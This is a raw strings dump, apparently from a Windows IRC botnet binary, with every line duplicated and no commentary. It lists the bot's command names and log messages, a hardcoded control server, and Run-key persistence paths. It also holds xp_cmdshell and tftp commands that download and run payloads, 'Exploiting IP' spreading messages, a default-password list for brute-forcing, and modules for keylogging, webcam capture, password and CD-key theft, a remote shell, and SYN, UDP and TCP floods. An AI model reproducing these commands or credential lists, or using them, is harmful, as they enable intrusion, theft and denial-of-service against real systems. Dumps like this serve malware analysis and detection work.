Win2k Professional [universal] netrap.dll
Win2k Advanced Server [SP4] netrap.dll
Win2k Advanced Server [SP4] netrap.dll
tftp -i %s get %s
tftp -i %s get %s
\\%s\ipc$
\\%s\ipc$
%s Error: %s .
%s Error: %s .
explorer.exe
explorer.exe
%s %s
%s %s
%sdel.bat
%sdel.bat
del "%s"
del "%s"
%%comspec%% /c %s %s
%%comspec%% /c %s %s
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
EXEC master..xp_cmdshell 'tftp -i %s GET %s'
EXEC master..xp_cmdshell 'tftp -i %s GET %s'
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell '%s'
[%s]: Exploiting IP: (%s:%d) User: (%s/%s).
[%s]: Exploiting IP: (%s:%d) User: (%s/%s).
[NET]: %s service: '%s'.
[NET]: %s service: '%s'.
[NET]: Error with service: '%s'. %s
[NET]: Error with service: '%s'. %s
[NET]: %s: No service specified.
[NET]: %s: No service specified.
The following Windows services are registered:
The following Windows services are registered:
%s: %s (%s)
%s: %s (%s)
[NET]: %s share: '%s'.
[NET]: %s share: '%s'.
[NET]: %s: Error with share: '%s'. %s
[NET]: %s: Error with share: '%s'. %s
[NET]: %s: No share specified.
[NET]: %s: No share specified.
[NET]: Share list error: %s
[NET]: Share list error: %s
[NET]: %s username: '%s'.
[NET]: %s username: '%s'.
[NET]: %s: Error with username: '%s'. %s
[NET]: %s: Error with username: '%s'. %s
[NET]: %s: No username specified.
[NET]: %s: No username specified.
Account: %S
Account: %S
Full Name: %S
Full Name: %S
User Comment: %S
User Comment: %S
Comment: %S
Comment: %S
Privilege Level: %s
Privilege Level: %s
Auth Flags: %d
Auth Flags: %d
Home Directory: %S
Home Directory: %S
Parameters: %S
Parameters: %S
Password Age: %d
Password Age: %d
Bad Password Count: %d
Bad Password Count: %d
Number of Logins: %d
Number of Logins: %d
Last Logon: %d
Last Logon: %d
Last Logoff: %d
Last Logoff: %d
Logon Server: %S
Logon Server: %S
Workstations: %S
Workstations: %S
Country Code: %d
Country Code: %d
User's Language: %d
User's Language: %d
Max. Storage: %d
Max. Storage: %d
Units Per Week: %d
Units Per Week: %d
[NET]: User list error: %s
[NET]: User list error: %s
Total users found: %d.
Total users found: %d.
This network request is not supported.
This network request is not supported.
The operation is allowed only on the primary domain controller of the domain.
The operation is allowed only on the primary domain controller of the domain.
The password is shorter than required (or does not meet the password policy requirement.)
The password is shorter than required (or does not meet the password policy requirement.)
[NET]: %s
[NET]: %s
c$\windows\system32
c$\windows\system32
%s\%s\%s
%s\%s\%s
(no password)
(no password)
[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)
[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)
%s\ipc$
%s\ipc$
[FLUSHDNS]: Error getting ARP cache: .
[FLUSHDNS]: Error getting ARP cache: .
[FLUSHDNS]: Not supported by this system.
[FLUSHDNS]: Not supported by this system.
[PING]: Error sending pings to %s.
[PING]: Error sending pings to %s.
[PING]: Finished sending pings to %s.
[PING]: Finished sending pings to %s.
[UDP]: Error sending pings to %s.
[UDP]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Finished sending packets to %s.
%s (%d)
%s (%d)
bot.neverup.asia
bot.neverup.asia
svchost.exe
svchost.exe
system.txt
system.txt
msconfig.dat
msconfig.dat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
Software\Microsoft\Windows\CurrentVersion\RunServices
password1
password1
password
password
passwd
passwd
pass1234
pass1234
1234567
1234567
12345678
12345678
123456789
123456789
1234567890
1234567890
windows
windows
login
login
loginpass
loginpass
domainpass
domainpass
domainpassword
domainpassword
dbpass
dbpass
dbpassword
dbpassword
databasepass
databasepass
databasepassword
databasepassword
sqlpassoainstall
sqlpassoainstall
winpass
winpass
%s %d "%s"
%s %d "%s"
[IDENTD]: Server running on Port: 113.
[IDENTD]: Server running on Port: 113.
[IDENTD]: Failed to start server, error: .
[IDENTD]: Failed to start server, error: .
[MAIN]: Connected to %s.
[MAIN]: Connected to %s.
PASS %s
PASS %s
NICK %s
NICK %s
USER %s 0 0 :%s
USER %s 0 0 :%s
PONG %s
PONG %s
JOIN %s %s
JOIN %s %s
USERHOST %s
USERHOST %s
MODE %s %s
MODE %s %s
[MAIN]: User %s logged out.
[MAIN]: User %s logged out.
NOTICE %s :%s
NOTICE %s :%s
NICK
NICK
:%s%s
:%s%s
[MAIN]: User: %s logged out.
[MAIN]: User: %s logged out.
[MAIN]: Joined channel: %s.
[MAIN]: Joined channel: %s.
NOTICE %s :
NOTICE %s :
VERSION %s
VERSION %s
PING %s
PING %s
[DCC]: Receive file: '%s' from user: %s.
[DCC]: Receive file: '%s' from user: %s.
[DCC]: Failed to start transfer thread, error: .
[DCC]: Failed to start transfer thread, error: .
[DCC]: Receive file: '%s' failed from unauthorized user: %s.
[DCC]: Receive file: '%s' failed from unauthorized user: %s.
[DCC]: Chat from user: %s.
[DCC]: Chat from user: %s.
[DCC]: Failed to start chat thread, error: .
[DCC]: Failed to start chat thread, error: .
[DCC]: Chat already active with user: %s.
[DCC]: Chat already active with user: %s.
[DCC]: Chat failed by unauthorized user: %s.
[DCC]: Chat failed by unauthorized user: %s.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s :Your attempt has been logged.
NOTICE %s :Your attempt has been logged.
[MAIN]: *Failed pass auth by: (%s!%s).
[MAIN]: *Failed pass auth by: (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
[MAIN]: *Failed host auth by: (%s!%s).
[MAIN]: *Failed host auth by: (%s!%s).
[MAIN]: Password accepted.
[MAIN]: Password accepted.
[MAIN]: User: %s logged in.
[MAIN]: User: %s logged in.
$rndnick
$rndnick
rndnick
rndnick
[MAIN]: Random nick change: %s
[MAIN]: Random nick change: %s
[MAIN]: No user logged in at slot: %d.
[MAIN]: No user logged in at slot: %d.
[MAIN]: Invalid login slot number: %d.
[MAIN]: Invalid login slot number: %d.
[MAIN]: %s
[MAIN]: %s
[SECURE]: %s system.
[SECURE]: %s system.
[SECURE]: Failed to start secure thread, error: .
[SECURE]: Failed to start secure thread, error: .
[SOCKS4]: Server started on: %s:%d.
[SOCKS4]: Server started on: %s:%d.
[SOCKS4]: Failed to start server thread, error: .
[SOCKS4]: Failed to start server thread, error: .
rloginstop
rloginstop
[RLOGIND]
[RLOGIND]
httpstop
httpstop
[HTTPD]
[HTTPD]
TCP redirect
TCP redirect
ddos.stop
ddos.stop
udpstop
udpstop
UDP flood
UDP flood
tftpstop
tftpstop
[TFTP]
[TFTP]
QUIT :%s
QUIT :%s
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: .
[THREADS]: Failed to start list thread, error: .
[LOG]: Failed to start listing thread, error: .
[LOG]: Failed to start listing thread, error: .
[PROCS]: Failed to start listing thread, error: .
[PROCS]: Failed to start listing thread, error: .
getcdkeys
getcdkeys
[CDKEYS]: Search completed.
[CDKEYS]: Search completed.
[MAIN]: Uptime: %s.
[MAIN]: Uptime: %s.
opencmd
opencmd
ocmd
ocmd
[CMD]: Remote shell already running.
[CMD]: Remote shell already running.
[CMD]: Couldn't open remote shell.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell ready.
[CMD]: Remote shell ready.
cmdstop
cmdstop
[CMD]
[CMD]
-[Login List]-
-[Login List]-
%d. %s
%d. %s
[MAIN]: Login list complete.
[MAIN]: Login list complete.
[FLUSHDNS]: Failed to load dnsapi.dll.
[FLUSHDNS]: Failed to load dnsapi.dll.
rloginserver
rloginserver
rlogin
rlogin
[RLOGIND]: Server listening on IP: %s:%d, Username: %s.
[RLOGIND]: Server listening on IP: %s:%d, Username: %s.
[RLOGIND]: Failed to start server thread, error: .
[RLOGIND]: Failed to start server thread, error: .
httpserver
httpserver
[HTTPD]: Failed to start server thread, error: .
[HTTPD]: Failed to start server thread, error: .
tftpserver
tftpserver
tftp
tftp
[TFTP]: Already running.
[TFTP]: Already running.
[TFTP]: Failed to start server thread, error: .
[TFTP]: Failed to start server thread, error: .
findpass
findpass
[FINDPASS]: Searching for password.
[FINDPASS]: Searching for password.
[FINDPASS]: Failed to start search thread, error: .
[FINDPASS]: Failed to start search thread, error: .
nick
nick
[MAIN]: Nick changed to: '%s'.
[MAIN]: Nick changed to: '%s'.
join
join
[MAIN]: Joined channel: '%s'.
[MAIN]: Joined channel: '%s'.
PART %s
PART %s
[MAIN]: Parted channel: '%s'.
[MAIN]: Parted channel: '%s'.
[MAIN]: IRC Raw: %s.
[MAIN]: IRC Raw: %s.
[THREADS]: Stopped: %d thread(s).
[THREADS]: Stopped: %d thread(s).
[THREADS]: Killed thread: %s.
[THREADS]: Killed thread: %s.
[THREADS]: Failed to kill thread: %s.
[THREADS]: Failed to kill thread: %s.
c_rndnick
c_rndnick
[MAIN]: Prefix changed to: '%c'.
[MAIN]: Prefix changed to: '%c'.
[SHELL]: File opened: %s
[SHELL]: File opened: %s
[SHELL]: Couldn't open file: %s
[SHELL]: Couldn't open file: %s
[MAIN]: Server changed to: '%s'.
[MAIN]: Server changed to: '%s'.
[DNS]: Lookup: %s -> %s.
[DNS]: Lookup: %s -> %s.
[PROC]: Process killed: %s
[PROC]: Process killed: %s
[PROC]: Failed to terminate process: %s
[PROC]: Failed to terminate process: %s
[PROC]: Process killed ID: %s
[PROC]: Process killed ID: %s
[PROC]: Failed to terminate process ID: %s
[PROC]: Failed to terminate process ID: %s
[FILE]: Deleted '%s'.
[FILE]: Deleted '%s'.
[DCC]: Send File: %s, User: %s.
[DCC]: Send File: %s, User: %s.
[FILE]: List: %s
[FILE]: List: %s
[VISIT]: URL: %s.
[VISIT]: URL: %s.
[VISIT]: Failed to start connection thread, error: .
[VISIT]: Failed to start connection thread, error: .
mirccmd
mirccmd
[CMD]: Error sending to remote shell.
[CMD]: Error sending to remote shell.
[CMD]: Commands: %s
[CMD]: Commands: %s
[MAIN]: Read file complete: %s
[MAIN]: Read file complete: %s
[MAIN]: Read file failed: %s
[MAIN]: Read file failed: %s
[IDENT]: Server stopped. (%d thread(s) stopped.)
[IDENT]: Server stopped. (%d thread(s) stopped.)
keylog
keylog
[KEYLOG]: Already running.
[KEYLOG]: Already running.
[KEYLOG]: Key logger active.
[KEYLOG]: Key logger active.
[KEYLOG]: Failed to start logging thread, error: .
[KEYLOG]: Failed to start logging thread, error: .
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[KEYLOG]: No key logger thread found.
[KEYLOG]: No key logger thread found.
[NET]: Failed to load advapi32.dll or netapi32.dll.
[NET]: Failed to load advapi32.dll or netapi32.dll.
[CAPTURE]: Screen capture saved to: %s.
[CAPTURE]: Screen capture saved to: %s.
[CAPTURE]: Driver #%d - %s - %s.
[CAPTURE]: Driver #%d - %s - %s.
[CAPTURE]: Webcam capture saved to: %s.
[CAPTURE]: Webcam capture saved to: %s.
[CAPTURE]: Error while capturing from webcam.
[CAPTURE]: Error while capturing from webcam.
[CAPTURE]: Invalid parameters for webcam capture.
[CAPTURE]: Invalid parameters for webcam capture.
[CAPTURE]: Amateur video saved to: %s.
[CAPTURE]: Amateur video saved to: %s.
[CAPTURE]: Error while capturing amateur video from webcam.
[CAPTURE]: Error while capturing amateur video from webcam.
%s %s %s :%s
%s %s %s :%s
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Gethost: %s.
[MAIN]: Gethost: %s.
[MAIN]: Alias added: %s.
[MAIN]: Alias added: %s.
privmsg
privmsg
[MAIN]: Privmsg: %s: %s.
[MAIN]: Privmsg: %s: %s.
ACTION %s
ACTION %s
[MAIN]: Action: %s: %s.
[MAIN]: Action: %s: %s.
MODE %s
MODE %s
[MAIN]: Mode change: %s
[MAIN]: Mode change: %s
[CLONE]: Raw (%s): %s
[CLONE]: Raw (%s): %s
[CLONE]: Mode (%s): %s
[CLONE]: Mode (%s): %s
c_nick
c_nick
[CLONE]: Nick (%s): %s
[CLONE]: Nick (%s): %s
c_join
c_join
[MAIN]: Repeat: %s
[MAIN]: Repeat: %s
[MAIN]: Repeat not allowed in command line: %s
[MAIN]: Repeat not allowed in command line: %s
%s%s.exe
%s%s.exe
[UPDATE]: Downloading update from: %s.
[UPDATE]: Downloading update from: %s.
[UPDATE]: Failed to start download thread, error: .
[UPDATE]: Failed to start download thread, error: .
[EXEC]: Couldn't execute file.
[EXEC]: Couldn't execute file.
[EXEC]: Commands: %s
[EXEC]: Commands: %s
[FINDFILE]: Searching for file: %s in: %s.
[FINDFILE]: Searching for file: %s in: %s.
[FINDFILE]: Failed to start search thread, error: .
[FINDFILE]: Failed to start search thread, error: .
[FILE]: Rename: '%s' to: '%s'.
[FILE]: Rename: '%s' to: '%s'.
[ICMP]: Flooding: (%s) for %s seconds.
[ICMP]: Flooding: (%s) for %s seconds.
[ICMP]: Failed to start flood thread, error: .
[ICMP]: Failed to start flood thread, error: .
[CLONES]: Created on %s:%d, in channel %s.
[CLONES]: Created on %s:%d, in channel %s.
[CLONES]: Failed to start clone thread, error: .
[CLONES]: Failed to start clone thread, error: .
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DDoS]: Failed to start flood thread, error: .
[DDoS]: Failed to start flood thread, error: .
[SYN]: Flooding: (%s:%s) for %s seconds.
[SYN]: Flooding: (%s:%s) for %s seconds.
[SYN]: Failed to start flood thread, error: .
[SYN]: Failed to start flood thread, error: .
[DOWNLOAD]: Downloading URL: %s to: %s.
[DOWNLOAD]: Downloading URL: %s to: %s.
[DOWNLOAD]: Failed to start transfer thread, error: .
[DOWNLOAD]: Failed to start transfer thread, error: .
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[REDIRECT]: Failed to start redirection thread, error: .
[REDIRECT]: Failed to start redirection thread, error: .
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[SCAN]: Failed to start scan thread, error: .
[SCAN]: Failed to start scan thread, error: .
c_privmsg
c_privmsg
[%s] %s
[%s] %s
[%s] * %s %s
[%s] * %s %s
[SCAN]: Already %d scanning threads. Too many specified.
[SCAN]: Already %d scanning threads. Too many specified.
[SCAN]: Failed to start scan, port is invalid.
[SCAN]: Failed to start scan, port is invalid.
[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
udpflood
udpflood
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
[UDP]: Failed to start flood thread, error: .
[UDP]: Failed to start flood thread, error: .
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[PING]: Failed to start flood thread, error: .
[PING]: Failed to start flood thread, error: .
ICMP.dll not available
ICMP.dll not available
tcpflood
tcpflood
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: Failed to start flood thread, error: .
[TCP]: Failed to start flood thread, error: .
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Invalid flood type specified.
[TCP]: Invalid flood type specified.
helo $rndnick
helo $rndnick
mail from:
mail from:
rcpt to:
rcpt to:
subject: %s
subject: %s
from: %s
from: %s
[EMAIL]: Message sent to %s.
[EMAIL]: Message sent to %s.
httpcon
httpcon
[FTP]: File not found: %s.
[FTP]: File not found: %s.
%s\%i%i%i.dll
%s\%i%i%i.dll
open %s
open %s
put %s
put %s
-s:%s
-s:%s
PTF.exe
PTF.exe
[FTP]: Uploading file: %s to: %s
[FTP]: Uploading file: %s to: %s
[FTP]: Uploading file: %s to: %s failed.
[FTP]: Uploading file: %s to: %s failed.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start client thread, error: .
[REDIRECT]: Failed to start client thread, error: .
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start connection thread, error: .
[REDIRECT]: Failed to start connection thread, error: .
PRIVMSG %s :%s
PRIVMSG %s :%s
[CMD]: Could not read data from proccess
[CMD]: Could not read data from proccess
[CMD]: Proccess has terminated.
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess.
[CMD]: Could not read data from proccess.
cmd.exe
cmd.exe
[CMD]: Remote Command Prompt
[CMD]: Remote Command Prompt
[CMD]: Failed to start IO thread, error: .
[CMD]: Failed to start IO thread, error: .
[RLOGIND]: Error: getpeername(): .
[RLOGIND]: Error: getpeername(): .
[RLOGIND]: User logged in: .
[RLOGIND]: User logged in: .
[RLOGIND]: Error: SessionRun(): .
[RLOGIND]: Error: SessionRun(): .
[RLOGIND]: User logged out: .
[RLOGIND]: User logged out: .
[RLOGIND]: Protocol string too long.
[RLOGIND]: Protocol string too long.
[RLOGIND]: Login rejected, Remote user: .
[RLOGIND]: Login rejected, Remote user: .
[RLOGIND]: Error: WSAStartup(): .
[RLOGIND]: Error: WSAStartup(): .
[RLOGIND]: Failed to install control-C handler, error: .
[RLOGIND]: Failed to install control-C handler, error: .
[RLOGIND]: Ready and waiting for incoming connections.
[RLOGIND]: Ready and waiting for incoming connections.
[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.
[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.
[RLOGIND]: Failed to start client thread, error: .
[RLOGIND]: Failed to start client thread, error: .
[RLOGIND]: Error: server failed, returned: .
[RLOGIND]: Error: server failed, returned: .
[%s]|
[%s]|
[%d]%s
[%d]%s
[SCAN]: IP: %s Port: %d is open.
[SCAN]: IP: %s Port: %d is open.
[SCAN]: Scanning IP: %s, Port: %d.
[SCAN]: Scanning IP: %s, Port: %d.
[SECURE]: Failed to open DCOM registry key.
[SECURE]: Failed to open DCOM registry key.
[SECURE]: Failed to open IPC$ Restriction registry key.
[SECURE]: Failed to open IPC$ Restriction registry key.
[SECURE]: Advapi32.dll couldn't be loaded.
[SECURE]: Advapi32.dll couldn't be loaded.
[SECURE]: Share '%S' deleted.
[SECURE]: Share '%S' deleted.
[SECURE]: Failed to delete '%S' share.
[SECURE]: Failed to delete '%S' share.
[SECURE]: Share '%s' deleted.
[SECURE]: Share '%s' deleted.
[SECURE]: Failed to delete '%s' share.
[SECURE]: Failed to delete '%s' share.
[SECURE]: Netapi32.dll couldn't be loaded.
[SECURE]: Netapi32.dll couldn't be loaded.
[SECURE]: Failed to open IPC$ restriction registry key.
[SECURE]: Failed to open IPC$ restriction registry key.
[SECURE]: Share '%s' added.
[SECURE]: Share '%s' added.
[SECURE]: Failed to add '%s' share.
[SECURE]: Failed to add '%s' share.
[RLOGIND]: Failed to create ReadShell session thread, error: .
[RLOGIND]: Failed to create ReadShell session thread, error: .
[RLOGIND]: WaitForMultipleObjects error: .
[RLOGIND]: WaitForMultipleObjects error: .
[RLOGIND]: Failed to create shell stdout pipe, error: .
[RLOGIND]: Failed to create shell stdout pipe, error: .
[RLOGIND]: Failed to create shell stdin pipe, error: .
[RLOGIND]: Failed to create shell stdin pipe, error: .
[RLOGIND]: Failed to execute shell.
[RLOGIND]: Failed to execute shell.
cmd /q
cmd /q
[RLOGIND]: Failed to execute shell, error: .
[RLOGIND]: Failed to execute shell, error: .
[RLOGIND]: SessionReadShellThread exited, error: .
[RLOGIND]: SessionReadShellThread exited, error: .
tPTF.exe -i get
tPTF.exe -i get
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SOCKS4]: Failed to start client thread, error: .
[SOCKS4]: Failed to start client thread, error: .
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SOCKS4]: Error: Failed to open socket(), returned: .
[SOCKS4]: Error: Failed to open socket(), returned: .
[SOCKS4]: Error: Failed to connect to target, returned: .
[SOCKS4]: Error: Failed to connect to target, returned: .
[SYN]: Send error: .
[SYN]: Send error: .
à %dh %dm
à %dh %dm
%s (%s)
%s (%s)
[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s.
[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s.
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[TCP]: Error: socket() failed, returned: .
[TCP]: Error: socket() failed, returned: .
[TCP]: Error: setsockopt() failed, returned: .
[TCP]: Error: setsockopt() failed, returned: .
[TCP]: Invalid target IP.
[TCP]: Invalid target IP.
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: .
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: .
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TFTP]: Error: socket() failed, returned: .
[TFTP]: Error: socket() failed, returned: .
[TFTP]: Failed to open file: %s.
[TFTP]: Failed to open file: %s.
[TFTP]: File not found: %s (%s).
[TFTP]: File not found: %s (%s).
[TFTP]: File transfer started to IP: %s (%s).
[TFTP]: File transfer started to IP: %s (%s).
[TFTP]: File transfer complete to IP: %s (%s).
[TFTP]: File transfer complete to IP: %s (%s).
%s: %s stopped. (%d thread(s) stopped.)
%s: %s stopped. (%d thread(s) stopped.)
%s: No %s thread found.
%s: No %s thread found.
[VISIT]: Invalid URL.
[VISIT]: Invalid URL.
[VISIT]: Failed to connect to HTTP server.
[VISIT]: Failed to connect to HTTP server.
[VISIT]: URL visited.
[VISIT]: URL visited.
[VISIT]: Failed to get requested URL from HTTP server.
[VISIT]: Failed to get requested URL from HTTP server.
zcÃ
zcÃ
[10-10-2016 05:13:03] [IDENTD]: Server running on Port: 113.
[10-10-2016 05:13:03] [IDENTD]: Server running on Port: 113.
%System%\eohpsgi.exe
%System%\eohpsgi.exe
TransactNamedPipe
TransactNamedPipe
GetProcessHeap
GetProcessHeap
PeekNamedPipe
PeekNamedPipe
CreatePipe
CreatePipe
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
0!1)1]1{1
0!1)1]1{1
3O4
3O4
: :4:::]:
: :4:::]:
11`1i1d2m2
11`1i1d2m2
: :4:?:[:
: :4:?:[:
5054585
5054585
7.72767:7>7
7.72767:7>7
8#8)81878]8
8#8)81878]8
? ?$?8?
? ?$?8?
1 2(2,20242
1 2(2,20242
\C$\123456111111111111111.doc
\C$\123456111111111111111.doc
127.0.0.1\IPC$\
127.0.0.1\IPC$\
Windows 2000 2195
Windows 2000 2195
Windows 2000 5.0
Windows 2000 5.0
\\192.168.1.210\IPC$
\\192.168.1.210\IPC$
\PIPE\
\PIPE\